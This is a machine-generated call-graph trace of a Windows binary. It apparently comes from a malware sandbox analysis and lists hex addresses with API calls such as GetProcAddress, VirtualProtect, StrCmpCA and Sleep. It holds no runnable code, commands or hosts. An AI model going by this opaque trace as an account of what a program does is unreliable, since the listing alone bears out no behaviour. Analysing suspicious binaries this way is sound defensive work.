37770->37771 37772 825f96 37771->37772 37773 82acc0 4 API calls 37772->37773 37774 825fba 37773->37774 37775 82abb0 lstrcpy 37774->37775 37776 825fc6 37775->37776 37777 82aa50 lstrcpy 37776->37777 37778 825fee 37777->37778 38708 827690 GetWindowsDirectoryA 37778->38708 37781 82aab0 lstrcpy 37782 826008 37781->37782 38718 8148d0 37782->38718 37784 82600e 38863 8219f0 37784->38863 37786 826016 37787 82aa50 lstrcpy 37786->37787 37788 826039 37787->37788 37789 811590 lstrcpy 37788->37789 37790 82604d 37789->37790 38879 8159b0 34 API calls ctype 37790->38879 37792 826053 38880 821280 lstrlen lstrcpy 37792->38880 37794 82605e 37795 82aa50 lstrcpy 37794->37795 37796 826082 37795->37796 37797 811590 lstrcpy 37796->37797 37798 826096 37797->37798 38881 8159b0 34 API calls ctype 37798->38881 37800 82609c 38882 820fc0 StrCmpCA StrCmpCA StrCmpCA lstrlen lstrcpy 37800->38882 37802 8260a7 37803 82aa50 lstrcpy 37802->37803 37804 8260c9 37803->37804 37805 811590 lstrcpy 37804->37805 37806 8260dd 37805->37806 38883 8159b0 34 API calls ctype 37806->38883 37808 8260e3 38884 821170 StrCmpCA lstrlen lstrcpy 37808->38884 37810 8260ee 37811 811590 lstrcpy 37810->37811 37812 826105 37811->37812 38885 821c60 115 API calls 37812->38885 37814 82610a 37815 82aa50 lstrcpy 37814->37815 37816 826126 37815->37816 38886 815000 7 API calls 37816->38886 37818 82612b 37819 811590 lstrcpy 37818->37819 37820 8261ab 37819->37820 38887 8208a0 285 API calls 37820->38887 37822 8261b0 37823 82aa50 lstrcpy 37822->37823 37824 8261d6 37823->37824 37825 811590 lstrcpy 37824->37825 37826 8261ea 37825->37826 38888 8159b0 34 API calls ctype 37826->38888 37828 8261f0 38889 8213c0 StrCmpCA lstrlen lstrcpy 37828->38889 37830 8261fb 37831 811590 lstrcpy 37830->37831 37832 82623b 37831->37832 38890 811ec0 59 API calls 37832->38890 37834 826240 37835 8262e2 37834->37835 37836 826250 37834->37836 37837 82aab0 lstrcpy 37835->37837 37838 82aa50 lstrcpy 37836->37838 37839 8262f5 37837->37839 37840 826270 37838->37840 37842 811590 lstrcpy 37839->37842 37841 811590 lstrcpy 37840->37841 37843 826284 37841->37843 37844 826309 37842->37844 38891 8159b0 34 API calls ctype 37843->38891 38894 8159b0 34 API calls ctype 37844->38894 37847 82630f 38895 8237b0 31 API calls 37847->38895 37848 82628a 38892 821520 19 API calls ctype 37848->38892 37851 8262da 37855 811590 lstrcpy 37851->37855 37889 82635b 37851->37889 37852 826295 37853 811590 lstrcpy 37852->37853 37854 8262d5 37853->37854 38893 824010 67 API calls 37854->38893 37858 826337 37855->37858 37857 826380 37861 811590 lstrcpy 37857->37861 37874 8263a5 37857->37874 38896 824300 57 API calls 2 library calls 37858->38896 37859 811590 lstrcpy 37860 82637b 37859->37860 38898 8249d0 88 API calls ctype 37860->38898 37864 8263a0 37861->37864 38899 824e00 61 API calls ctype 37864->38899 37865 82633c 37870 811590 lstrcpy 37865->37870 37866 811590 lstrcpy 37871 8263c5 37866->37871 37867 811590 lstrcpy 37872 8263ea 37867->37872 37868 8263ef 37873 811590 lstrcpy 37868->37873 37876 826414 37868->37876 37875 826356 37870->37875 38900 824fc0 65 API calls 37871->38900 38901 825190 63 API calls ctype 37872->38901 37881 82640f 37873->37881 37874->37866 37884 8263ca 37874->37884 38897 825350 44 API calls 37875->38897 37877 826439 37876->37877 37883 811590 lstrcpy 37876->37883 37879 826460 37877->37879 37885 811590 lstrcpy 37877->37885 37886 826503 37879->37886 37887 826470 37879->37887 38902 817770 107 API calls ctype 37881->38902 37890 826434 37883->37890 37884->37867 37884->37868 37891 826459 37885->37891 37892 82aab0 lstrcpy 37886->37892 37893 82aa50 lstrcpy 37887->37893 37889->37857 37889->37859 38903 8252a0 61 API calls ctype 37890->38903 38904 8291a0 46 API calls ctype 37891->38904 37896 826516 37892->37896 37897 826491 37893->37897 37898 811590 lstrcpy 37896->37898 37899 811590 lstrcpy 37897->37899 37900 82652a 37898->37900 37901 8264a5 37899->37901 38908 8159b0 34 API calls ctype 37900->38908 38905 8159b0 34 API calls ctype 37901->38905 37904 826530 38909 8237b0 31 API calls 37904->38909 37905 8264ab 38906 821520 19 API calls ctype 37905->38906 37908 8264b6 37910 811590 lstrcpy 37908->37910 37909 8264fb 37912 82aab0 lstrcpy 37909->37912 37911 8264f6 37910->37911 38907 824010 67 API calls 37911->38907 37913 82654c 37912->37913 37915 811590 lstrcpy 37913->37915 37916 826560 37915->37916 38910 8159b0 34 API calls ctype 37916->38910 37918 82656c 37920 826588 37918->37920 38911 8268d0 9 API calls ctype 37918->38911 37920->37566 37922 814621 RtlAllocateHeap 37921->37922 37925 814671 VirtualProtect 37922->37925 37925->37570 37926->37657 37929 8110c2 ctype 37927->37929 37928 8110fd 37928->37687 37929->37928 37930 8110e2 VirtualFree 37929->37930 37930->37928 37932 811233 GlobalMemoryStatusEx 37931->37932 37932->37690 37933->37714 37935 82aad2 37934->37935 37936 82aafc 37935->37936 37937 82aaea lstrcpy 37935->37937 37936->37719 37937->37936 37939 82aa50 lstrcpy 37938->37939 37940 826ad3 37939->37940 37941 82acc0 4 API calls 37940->37941 37942 826ae5 37941->37942 37943 82abb0 lstrcpy 37942->37943 37944 826aee 37943->37944 37945 82acc0 4 API calls 37944->37945 37946 826b07 37945->37946 37947 82abb0 lstrcpy 37946->37947 37948 826b10 37947->37948 37949 82acc0 4 API calls 37948->37949 37950 826b2a 37949->37950 37951 82abb0 lstrcpy 37950->37951 37952 826b33 37951->37952 37953 82acc0 4 API calls 37952->37953 37954 826b4c 37953->37954 37955 82abb0 lstrcpy 37954->37955 37956 826b55 37955->37956 37957 82acc0 4 API calls 37956->37957 37958 826b6f 37957->37958 37959 82abb0 lstrcpy 37958->37959 37960 826b78 37959->37960 37961 82acc0 4 API calls 37960->37961 37962 826b93 37961->37962 37963 82abb0 lstrcpy 37962->37963 37964 826b9c 37963->37964 37965 82aab0 lstrcpy 37964->37965 37966 826bb0 37965->37966 37966->37726 37968 82ab22 37967->37968 37968->37729 37970 82ab4f 37969->37970 37971 825da4 37970->37971 37972 82ab8b lstrcpy 37970->37972 37971->37739 37972->37971 37974 82abb0 lstrcpy 37973->37974 37975 826693 37974->37975 37976 82abb0 lstrcpy 37975->37976 37977 8266a5 37976->37977 37978 82abb0 lstrcpy 37977->37978 37979 8266b7 37978->37979 37980 82abb0 lstrcpy 37979->37980 37981 825dd6 37980->37981 37981->37745 37983 814610 2 API calls 37982->37983 37984 812704 37983->37984 37985 814610 2 API calls 37984->37985 37986 812727 37985->37986 37987 814610 2 API calls 37986->37987 37988 812740 37987->37988 37989 814610 2 API calls 37988->37989 37990 812759 37989->37990 37991 814610 2 API calls 37990->37991 37992 812786 37991->37992 37993 814610 2 API calls 37992->37993 37994 81279f 37993->37994 37995 814610 2 API calls 37994->37995 37996 8127b8 37995->37996 37997 814610 2 API calls 37996->37997 37998 8127e5 37997->37998 37999 814610 2 API calls 37998->37999 38000 8127fe 37999->38000 38001 814610 2 API calls 38000->38001 38002 812817 38001->38002 38003 814610 2 API calls 38002->38003 38004 812830 38003->38004 38005 814610 2 API calls 38004->38005 38006 812849 38005->38006 38007 814610 2 API calls 38006->38007 38008 812862 38007->38008 38009 814610 2 API calls 38008->38009 38010 81287b 38009->38010 38011 814610 2 API calls 38010->38011 38012 812894 38011->38012 38013 814610 2 API calls 38012->38013 38014 8128ad 38013->38014 38015 814610 2 API calls 38014->38015 38016 8128c6 38015->38016 38017 814610 2 API calls 38016->38017 38018 8128df 38017->38018 38019 814610 2 API calls 38018->38019 38020 8128f8 38019->38020 38021 814610 2 API calls 38020->38021 38022 812911 38021->38022 38023 814610 2 API calls 38022->38023 38024 81292a 38023->38024 38025 814610 2 API calls 38024->38025 38026 812943 38025->38026 38027 814610 2 API calls 38026->38027 38028 81295c 38027->38028 38029 814610 2 API calls 38028->38029 38030 812975 38029->38030 38031 814610 2 API calls 38030->38031 38032 81298e 38031->38032 38033 814610 2 API calls 38032->38033 38034 8129a7 38033->38034 38035 814610 2 API calls 38034->38035 38036 8129c0 38035->38036 38037 814610 2 API calls 38036->38037 38038 8129d9 38037->38038 38039 814610 2 API calls 38038->38039 38040 8129f2 38039->38040 38041 814610 2 API calls 38040->38041 38042 812a0b 38041->38042 38043 814610 2 API calls 38042->38043 38044 812a24 38043->38044 38045 814610 2 API calls 38044->38045 38046 812a3d 38045->38046 38047 814610 2 API calls 38046->38047 38048 812a56 38047->38048 38049 814610 2 API calls 38048->38049 38050 812a6f 38049->38050 38051 814610 2 API calls 38050->38051 38052 812a88 38051->38052 38053 814610 2 API calls 38052->38053 38054 812aa1 38053->38054 38055 814610 2 API calls 38054->38055 38056 812aba 38055->38056 38057 814610 2 API calls 38056->38057 38058 812ad3 38057->38058 38059 814610 2 API calls 38058->38059 38060 812aec 38059->38060 38061 814610 2 API calls 38060->38061 38062 812b05 38061->38062 38063 814610 2 API calls 38062->38063 38064 812b1e 38063->38064 38065 814610 2 API calls 38064->38065 38066 812b37 38065->38066 38067 814610 2 API calls 38066->38067 38068 812b50 38067->38068 38069 814610 2 API calls 38068->38069 38070 812b69 38069->38070 38071 814610 2 API calls 38070->38071 38072 812b82 38071->38072 38073 814610 2 API calls 38072->38073 38074 812b9b 38073->38074 38075 814610 2 API calls 38074->38075 38076 812bb4 38075->38076 38077 814610 2 API calls 38076->38077 38078 812bcd 38077->38078 38079 814610 2 API calls 38078->38079 38080 812be6 38079->38080 38081 814610 2 API calls 38080->38081 38082 812bff 38081->38082 38083 814610 2 API calls 38082->38083 38084 812c18 38083->38084 38085 814610 2 API calls 38084->38085 38086 812c31 38085->38086 38087 814610 2 API calls 38086->38087 38088 812c4a 38087->38088 38089 814610 2 API calls 38088->38089 38090 812c63 38089->38090 38091 814610 2 API calls 38090->38091 38092 812c7c 38091->38092 38093 814610 2 API calls 38092->38093 38094 812c95 38093->38094 38095 814610 2 API calls 38094->38095 38096 812cae 38095->38096 38097 814610 2 API calls 38096->38097 38098 812cc7 38097->38098 38099 814610 2 API calls 38098->38099 38100 812ce0 38099->38100 38101 814610 2 API calls 38100->38101 38102 812cf9 38101->38102 38103 814610 2 API calls 38102->38103 38104 812d12 38103->38104 38105 814610 2 API calls 38104->38105 38106 812d2b 38105->38106 38107 814610 2 API calls 38106->38107 38108 812d44 38107->38108 38109 814610 2 API calls 38108->38109 38110 812d5d 38109->38110 38111 814610 2 API calls 38110->38111 38112 812d76 38111->38112 38113 814610 2 API calls 38112->38113 38114 812d8f 38113->38114 38115 814610 2 API calls 38114->38115 38116 812da8 38115->38116 38117 814610 2 API calls 38116->38117 38118 812dc1 38117->38118 38119 814610 2 API calls 38118->38119 38120 812dda 38119->38120 38121 814610 2 API calls 38120->38121 38122 812df3 38121->38122 38123 814610 2 API calls 38122->38123 38124 812e0c 38123->38124 38125 814610 2 API calls 38124->38125 38126 812e25 38125->38126 38127 814610 2 API calls 38126->38127 38128 812e3e 38127->38128 38129 814610 2 API calls 38128->38129 38130 812e57 38129->38130 38131 814610 2 API calls 38130->38131 38132 812e70 38131->38132 38133 814610 2 API calls 38132->38133 38134 812e89 38133->38134 38135 814610 2 API calls 38134->38135 38136 812ea2 38135->38136 38137 814610 2 API calls 38136->38137 38138 812ebb 38137->38138 38139 814610 2 API calls 38138->38139 38140 812ed4 38139->38140 38141 814610 2 API calls 38140->38141 38142 812eed 38141->38142 38143 814610 2 API calls 38142->38143 38144 812f06 38143->38144 38145 814610 2 API calls 38144->38145 38146 812f1f 38145->38146 38147 814610 2 API calls 38146->38147 38148 812f38 38147->38148 38149 814610 2 API calls 38148->38149 38150 812f51 38149->38150 38151 814610 2 API calls 38150->38151 38152 812f6a 38151->38152 38153 814610 2 API calls 38152->38153 38154 812f83 38153->38154 38155 814610 2 API calls 38154->38155 38156 812f9c 38155->38156 38157 814610 2 API calls 38156->38157 38158 812fb5 38157->38158 38159 814610 2 API calls 38158->38159 38160 812fce 38159->38160 38161 814610 2 API calls 38160->38161 38162 812fe7 38161->38162 38163 814610 2 API calls 38162->38163 38164 813000 38163->38164 38165 814610 2 API calls 38164->38165 38166 813019 38165->38166 38167 814610 2 API calls 38166->38167 38168 813032 38167->38168 38169 814610 2 API calls 38168->38169 38170 81304b 38169->38170 38171 814610 2 API calls 38170->38171 38172 813064 38171->38172 38173 814610 2 API calls 38172->38173 38174 81307d 38173->38174 38175 814610 2 API calls 38174->38175 38176 813096 38175->38176 38177 814610 2 API calls 38176->38177 38178 8130af 38177->38178 38179 814610 2 API calls 38178->38179 38180 8130c8 38179->38180 38181 814610 2 API calls 38180->38181 38182 8130e1 38181->38182 38183 814610 2 API calls 38182->38183 38184 8130fa 38183->38184 38185 814610 2 API calls 38184->38185 38186 813113 38185->38186 38187 814610 2 API calls 38186->38187 38188 81312c 38187->38188 38189 814610 2 API calls 38188->38189 38190 813145 38189->38190 38191 814610 2 API calls 38190->38191 38192 81315e 38191->38192 38193 814610 2 API calls 38192->38193 38194 813177 38193->38194 38195 814610 2 API calls 38194->38195 38196 813190 38195->38196 38197 814610 2 API calls 38196->38197 38198 8131a9 38197->38198 38199 814610 2 API calls 38198->38199 38200 8131c2 38199->38200 38201 814610 2 API calls 38200->38201 38202 8131db 38201->38202 38203 814610 2 API calls 38202->38203 38204 8131f4 38203->38204 38205 814610 2 API calls 38204->38205 38206 81320d 38205->38206 38207 814610 2 API calls 38206->38207 38208 813226 38207->38208 38209 814610 2 API calls 38208->38209 38210 81323f 38209->38210 38211 814610 2 API calls 38210->38211 38212 813258 38211->38212 38213 814610 2 API calls 38212->38213 38214 813271 38213->38214 38215 814610 2 API calls 38214->38215 38216 81328a 38215->38216 38217 814610 2 API calls 38216->38217 38218 8132a3 38217->38218 38219 814610 2 API calls 38218->38219 38220 8132bc 38219->38220 38221 814610 2 API calls 38220->38221 38222 8132d5 38221->38222 38223 814610 2 API calls 38222->38223 38224 8132ee 38223->38224 38225 814610 2 API calls 38224->38225 38226 813307 38225->38226 38227 814610 2 API calls 38226->38227 38228 813320 38227->38228 38229 814610 2 API calls 38228->38229 38230 813339 38229->38230 38231 814610 2 API calls 38230->38231 38232 813352 38231->38232 38233 814610 2 API calls 38232->38233 38234 81336b 38233->38234 38235 814610 2 API calls 38234->38235 38236 813384 38235->38236 38237 814610 2 API calls 38236->38237 38238 81339d 38237->38238 38239 814610 2 API calls 38238->38239 38240 8133b6 38239->38240 38241 814610 2 API calls 38240->38241 38242 8133cf 38241->38242 38243 814610 2 API calls 38242->38243 38244 8133e8 38243->38244 38245 814610 2 API calls 38244->38245 38246 813401 38245->38246 38247 814610 2 API calls 38246->38247 38248 81341a 38247->38248 38249 814610 2 API calls 38248->38249 38250 813433 38249->38250 38251 814610 2 API calls 38250->38251 38252 81344c 38251->38252 38253 814610 2 API calls 38252->38253 38254 813465 38253->38254 38255 814610 2 API calls 38254->38255 38256 81347e 38255->38256 38257 814610 2 API calls 38256->38257 38258 813497 38257->38258 38259 814610 2 API calls 38258->38259 38260 8134b0 38259->38260 38261 814610 2 API calls 38260->38261 38262 8134c9 38261->38262 38263 814610 2 API calls 38262->38263 38264 8134e2 38263->38264 38265 814610 2 API calls 38264->38265 38266 8134fb 38265->38266 38267 814610 2 API calls 38266->38267 38268 813514 38267->38268 38269 814610 2 API calls 38268->38269 38270 81352d 38269->38270 38271 814610 2 API calls 38270->38271 38272 813546 38271->38272 38273 814610 2 API calls 38272->38273 38274 81355f 38273->38274 38275 814610 2 API calls 38274->38275 38276 813578 38275->38276 38277 814610 2 API calls 38276->38277 38278 813591 38277->38278 38279 814610 2 API calls 38278->38279 38280 8135aa 38279->38280 38281 814610 2 API calls 38280->38281 38282 8135c3 38281->38282 38283 814610 2 API calls 38282->38283 38284 8135dc 38283->38284 38285 814610 2 API calls 38284->38285 38286 8135f5 38285->38286 38287 814610 2 API calls 38286->38287 38288 81360e 38287->38288 38289 814610 2 API calls 38288->38289 38290 813627 38289->38290 38291 814610 2 API calls 38290->38291 38292 813640 38291->38292 38293 814610 2 API calls 38292->38293 38294 813659 38293->38294 38295 814610 2 API calls 38294->38295 38296 813672 38295->38296 38297 814610 2 API calls 38296->38297 38298 81368b 38297->38298 38299 814610 2 API calls 38298->38299 38300 8136a4 38299->38300 38301 814610 2 API calls 38300->38301 38302 8136bd 38301->38302 38303 814610 2 API calls 38302->38303 38304 8136d6 38303->38304 38305 814610 2 API calls 38304->38305 38306 8136ef 38305->38306 38307 814610 2 API calls 38306->38307 38308 813708 38307->38308 38309 814610 2 API calls 38308->38309 38310 813721 38309->38310 38311 814610 2 API calls 38310->38311 38312 81373a 38311->38312 38313 814610 2 API calls 38312->38313 38314 813753 38313->38314 38315 814610 2 API calls 38314->38315 38316 81376c 38315->38316 38317 814610 2 API calls 38316->38317 38318 813785 38317->38318 38319 814610 2 API calls 38318->38319 38320 81379e 38319->38320 38321 814610 2 API calls 38320->38321 38322 8137b7 38321->38322 38323 814610 2 API calls 38322->38323 38324 8137d0 38323->38324 38325 814610 2 API calls 38324->38325 38326 8137e9 38325->38326 38327 814610 2 API calls 38326->38327 38328 813802 38327->38328 38329 814610 2 API calls 38328->38329 38330 81381b 38329->38330 38331 814610 2 API calls 38330->38331 38332 813834 38331->38332 38333 814610 2 API calls 38332->38333 38334 81384d 38333->38334 38335 814610 2 API calls 38334->38335 38336 813866 38335->38336 38337 814610 2 API calls 38336->38337 38338 81387f 38337->38338 38339 814610 2 API calls 38338->38339 38340 813898 38339->38340 38341 814610 2 API calls 38340->38341 38342 8138b1 38341->38342 38343 814610 2 API calls 38342->38343 38344 8138ca 38343->38344 38345 814610 2 API calls 38344->38345 38346 8138e3 38345->38346 38347 814610 2 API calls 38346->38347 38348 8138fc 38347->38348 38349 814610 2 API calls 38348->38349 38350 813915 38349->38350 38351 814610 2 API calls 38350->38351 38352 81392e 38351->38352 38353 814610 2 API calls 38352->38353 38354 813947 38353->38354 38355 814610 2 API calls 38354->38355 38356 813960 38355->38356 38357 814610 2 API calls 38356->38357 38358 813979 38357->38358 38359 814610 2 API calls 38358->38359 38360 813992 38359->38360 38361 814610 2 API calls 38360->38361 38362 8139ab 38361->38362 38363 814610 2 API calls 38362->38363 38364 8139c4 38363->38364 38365 814610 2 API calls 38364->38365 38366 8139dd 38365->38366 38367 814610 2 API calls 38366->38367 38368 8139f6 38367->38368 38369 814610 2 API calls 38368->38369 38370 813a0f 38369->38370 38371 814610 2 API calls 38370->38371 38372 813a28 38371->38372 38373 814610 2 API calls 38372->38373 38374 813a41 38373->38374 38375 814610 2 API calls 38374->38375 38376 813a5a 38375->38376 38377 814610 2 API calls 38376->38377 38378 813a73 38377->38378 38379 814610 2 API calls 38378->38379 38380 813a8c 38379->38380 38381 814610 2 API calls 38380->38381 38382 813aa5 38381->38382 38383 814610 2 API calls 38382->38383 38384 813abe 38383->38384 38385 814610 2 API calls 38384->38385 38386 813ad7 38385->38386 38387 814610 2 API calls 38386->38387 38388 813af0 38387->38388 38389 814610 2 API calls 38388->38389 38390 813b09 38389->38390 38391 814610 2 API calls 38390->38391 38392 813b22 38391->38392 38393 814610 2 API calls 38392->38393 38394 813b3b 38393->38394 38395 814610 2 API calls 38394->38395 38396 813b54 38395->38396 38397 814610 2 API calls 38396->38397 38398 813b6d 38397->38398 38399 814610 2 API calls 38398->38399 38400 813b86 38399->38400 38401 814610 2 API calls 38400->38401 38402 813b9f 38401->38402 38403 814610 2 API calls 38402->38403 38404 813bb8 38403->38404 38405 814610 2 API calls 38404->38405 38406 813bd1 38405->38406 38407 814610 2 API calls 38406->38407 38408 813bea 38407->38408 38409 814610 2 API calls 38408->38409 38410 813c03 38409->38410 38411 814610 2 API calls 38410->38411 38412 813c1c 38411->38412 38413 814610 2 API calls 38412->38413 38414 813c35 38413->38414 38415 814610 2 API calls 38414->38415 38416 813c4e 38415->38416 38417 814610 2 API calls 38416->38417 38418 813c67 38417->38418 38419 814610 2 API calls 38418->38419 38420 813c80 38419->38420 38421 814610 2 API calls 38420->38421 38422 813c99 38421->38422 38423 814610 2 API calls 38422->38423 38424 813cb2 38423->38424 38425 814610 2 API calls 38424->38425 38426 813ccb 38425->38426 38427 814610 2 API calls 38426->38427 38428 813ce4 38427->38428 38429 814610 2 API calls 38428->38429 38430 813cfd 38429->38430 38431 814610 2 API calls 38430->38431 38432 813d16 38431->38432 38433 814610 2 API calls 38432->38433 38434 813d2f 38433->38434 38435 814610 2 API calls 38434->38435 38436 813d48 38435->38436 38437 814610 2 API calls 38436->38437 38438 813d61 38437->38438 38439 814610 2 API calls 38438->38439 38440 813d7a 38439->38440 38441 814610 2 API calls 38440->38441 38442 813d93 38441->38442 38443 814610 2 API calls 38442->38443 38444 813dac 38443->38444 38445 814610 2 API calls 38444->38445 38446 813dc5 38445->38446 38447 814610 2 API calls 38446->38447 38448 813dde 38447->38448 38449 814610 2 API calls 38448->38449 38450 813df7 38449->38450 38451 814610 2 API calls 38450->38451 38452 813e10 38451->38452 38453 814610 2 API calls 38452->38453 38454 813e29 38453->38454 38455 814610 2 API calls 38454->38455 38456 813e42 38455->38456 38457 814610 2 API calls 38456->38457 38458 813e5b 38457->38458 38459 814610 2 API calls 38458->38459 38460 813e74 38459->38460 38461 814610 2 API calls 38460->38461 38462 813e8d 38461->38462 38463 814610 2 API calls 38462->38463 38464 813ea6 38463->38464 38465 814610 2 API calls 38464->38465 38466 813ebf 38465->38466 38467 814610 2 API calls 38466->38467 38468 813ed8 38467->38468 38469 814610 2 API calls 38468->38469 38470 813ef1 38469->38470 38471 814610 2 API calls 38470->38471 38472 813f0a 38471->38472 38473 814610 2 API calls 38472->38473 38474 813f23 38473->38474 38475 814610 2 API calls 38474->38475 38476 813f3c 38475->38476 38477 814610 2 API calls 38476->38477 38478 813f55 38477->38478 38479 814610 2 API calls 38478->38479 38480 813f6e 38479->38480 38481 814610 2 API calls 38480->38481 38482 813f87 38481->38482 38483 814610 2 API calls 38482->38483 38484 813fa0 38483->38484 38485 814610 2 API calls 38484->38485 38486 813fb9 38485->38486 38487 814610 2 API calls 38486->38487 38488 813fd2 38487->38488 38489 814610 2 API calls 38488->38489 38490 813feb 38489->38490 38491 814610 2 API calls 38490->38491 38492 814004 38491->38492 38493 814610 2 API calls 38492->38493 38494 81401d 38493->38494 38495 814610 2 API calls 38494->38495 38496 814036 38495->38496 38497 814610 2 API calls 38496->38497 38498 81404f 38497->38498 38499 814610 2 API calls 38498->38499 38500 814068 38499->38500 38501 814610 2 API calls 38500->38501 38502 814081 38501->38502 38503 814610 2 API calls 38502->38503 38504 81409a 38503->38504 38505 814610 2 API calls 38504->38505 38506 8140b3 38505->38506 38507 814610 2 API calls 38506->38507 38508 8140cc 38507->38508 38509 814610 2 API calls 38508->38509 38510 8140e5 38509->38510 38511 814610 2 API calls 38510->38511 38512 8140fe 38511->38512 38513 814610 2 API calls 38512->38513 38514 814117 38513->38514 38515 814610 2 API calls 38514->38515 38516 814130 38515->38516 38517 814610 2 API calls 38516->38517 38518 814149 38517->38518 38519 814610 2 API calls 38518->38519 38520 814162 38519->38520 38521 814610 2 API calls 38520->38521 38522 81417b 38521->38522 38523 814610 2 API calls 38522->38523 38524 814194 38523->38524 38525 814610 2 API calls 38524->38525 38526 8141ad 38525->38526 38527 814610 2 API calls 38526->38527 38528 8141c6 38527->38528 38529 814610 2 API calls 38528->38529 38530 8141df 38529->38530 38531 814610 2 API calls 38530->38531 38532 8141f8 38531->38532 38533 814610 2 API calls 38532->38533 38534 814211 38533->38534 38535 814610 2 API calls 38534->38535 38536 81422a 38535->38536 38537 814610 2 API calls 38536->38537 38538 814243 38537->38538 38539 814610 2 API calls 38538->38539 38540 81425c 38539->38540 38541 814610 2 API calls 38540->38541 38542 814275 38541->38542 38543 814610 2 API calls 38542->38543 38544 81428e 38543->38544 38545 814610 2 API calls 38544->38545 38546 8142a7 38545->38546 38547 814610 2 API calls 38546->38547 38548 8142c0 38547->38548 38549 814610 2 API calls 38548->38549 38550 8142d9 38549->38550 38551 814610 2 API calls 38550->38551 38552 8142f2 38551->38552 38553 814610 2 API calls 38552->38553 38554 81430b 38553->38554 38555 814610 2 API calls 38554->38555 38556 814324 38555->38556 38557 814610 2 API calls 38556->38557 38558 81433d 38557->38558 38559 814610 2 API calls 38558->38559 38560 814356 38559->38560 38561 814610 2 API calls 38560->38561 38562 81436f 38561->38562 38563 814610 2 API calls 38562->38563 38564 814388 38563->38564 38565 814610 2 API calls 38564->38565 38566 8143a1 38565->38566 38567 814610 2 API calls 38566->38567 38568 8143ba 38567->38568 38569 814610 2 API calls 38568->38569 38570 8143d3 38569->38570 38571 814610 2 API calls 38570->38571 38572 8143ec 38571->38572 38573 814610 2 API calls 38572->38573 38574 814405 38573->38574 38575 814610 2 API calls 38574->38575 38576 81441e 38575->38576 38577 814610 2 API calls 38576->38577 38578 814437 38577->38578 38579 814610 2 API calls 38578->38579 38580 814450 38579->38580 38581 814610 2 API calls 38580->38581 38582 814469 38581->38582 38583 814610 2 API calls 38582->38583 38584 814482 38583->38584 38585 814610 2 API calls 38584->38585 38586 81449b 38585->38586 38587 814610 2 API calls 38586->38587 38588 8144b4 38587->38588 38589 814610 2 API calls 38588->38589 38590 8144cd 38589->38590 38591 814610 2 API calls 38590->38591 38592 8144e6 38591->38592 38593 814610 2 API calls 38592->38593 38594 8144ff 38593->38594 38595 814610 2 API calls 38594->38595 38596 814518 38595->38596 38597 814610 2 API calls 38596->38597 38598 814531 38597->38598 38599 814610 2 API calls 38598->38599 38600 81454a 38599->38600 38601 814610 2 API calls 38600->38601 38602 814563 38601->38602 38603 814610 2 API calls 38602->38603 38604 81457c 38603->38604 38605 814610 2 API calls 38604->38605 38606 814595 38605->38606 38607 814610 2 API calls 38606->38607 38608 8145ae 38607->38608 38609 814610 2 API calls 38608->38609 38610 8145c7 38609->38610 38611 814610 2 API calls 38610->38611 38612 8145e0 38611->38612 38613 814610 2 API calls 38612->38613 38614 8145f9 38613->38614 38615 829f20 38614->38615 38616 829f30 43 API calls 38615->38616 38617 82a346 8 API calls 38615->38617 38616->38617 38618 82a456 38617->38618 38619 82a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38617->38619 38620 82a463 8 API calls 38618->38620 38621 82a526 38618->38621 38619->38618 38620->38621 38622 82a5a8 38621->38622 38623 82a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38621->38623 38624 82a647 38622->38624 38625 82a5b5 6 API calls 38622->38625 38623->38622 38626 82a654 9 API calls 38624->38626 38627 82a72f 38624->38627 38625->38624 38626->38627 38628 82a7b2 38627->38628 38629 82a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38627->38629 38630 82a7bb GetProcAddress GetProcAddress 38628->38630 38631 82a7ec 38628->38631 38629->38628 38630->38631 38632 82a825 38631->38632 38633 82a7f5 GetProcAddress GetProcAddress 38631->38633 38634 82a922 38632->38634 38635 82a832 10 API calls 38632->38635 38633->38632 38636 82a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38634->38636 38637 82a98d 38634->38637 38635->38634 38636->38637 38638 82a996 GetProcAddress 38637->38638 38639 82a9ae 38637->38639 38638->38639 38640 82a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38639->38640 38641 825ef3 38639->38641 38640->38641 38642 811590 38641->38642 38912 8116b0 38642->38912 38645 82aab0 lstrcpy 38646 8115b5 38645->38646 38647 82aab0 lstrcpy 38646->38647 38648 8115c7 38647->38648 38649 82aab0 lstrcpy 38648->38649 38650 8115d9 38649->38650 38651 82aab0 lstrcpy 38650->38651 38652 811663 38651->38652 38653 825760 38652->38653 38654 825771 38653->38654 38655 82ab30 2 API calls 38654->38655 38656 82577e 38655->38656 38657 82ab30 2 API calls 38656->38657 38658 82578b 38657->38658 38659 82ab30 2 API calls 38658->38659 38660 825798 38659->38660 38661 82aa50 lstrcpy 38660->38661 38662 8257a5 38661->38662 38663 82aa50 lstrcpy 38662->38663 38664 8257b2 38663->38664 38665 82aa50 lstrcpy 38664->38665 38666 8257bf 38665->38666 38667 82aa50 lstrcpy 38666->38667 38706 8257cc 38667->38706 38668 825510 25 API calls 38668->38706 38669 825440 20 API calls 38669->38706 38670 825893 StrCmpCA 38670->38706 38671 8258f0 StrCmpCA 38672 825a2c 38671->38672 38671->38706 38673 82abb0 lstrcpy 38672->38673 38674 825a38 38673->38674 38676 82ab30 2 API calls 38674->38676 38675 82ab30 lstrlen lstrcpy 38675->38706 38677 825a46 38676->38677 38680 82ab30 2 API calls 38677->38680 38678 825aa6 StrCmpCA 38679 825be1 38678->38679 38678->38706 38681 82abb0 lstrcpy 38679->38681 38682 825a55 38680->38682 38683 825bed 38681->38683 38684 8116b0 lstrcpy 38682->38684 38685 82ab30 2 API calls 38683->38685 38703 825a61 38684->38703 38687 825bfb 38685->38687 38686 825c5b StrCmpCA 38688 825c66 Sleep 38686->38688 38689 825c78 38686->38689 38691 82ab30 2 API calls 38687->38691 38688->38706 38692 82abb0 lstrcpy 38689->38692 38690 82aa50 lstrcpy 38690->38706 38693 825c0a 38691->38693 38695 825c84 38692->38695 38694 8116b0 lstrcpy 38693->38694 38694->38703 38696 82ab30 2 API calls 38695->38696 38697 825c93 38696->38697 38698 82ab30 2 API calls 38697->38698 38699 825ca2 38698->38699 38701 8116b0 lstrcpy 38699->38701 38700 8259da StrCmpCA 38700->38706 38701->38703 38702 811590 lstrcpy 38702->38706 38703->37760 38704 825b8f StrCmpCA 38704->38706 38705 82aab0 lstrcpy 38705->38706 38706->38668 38706->38669 38706->38670 38706->38671 38706->38675 38706->38678 38706->38686 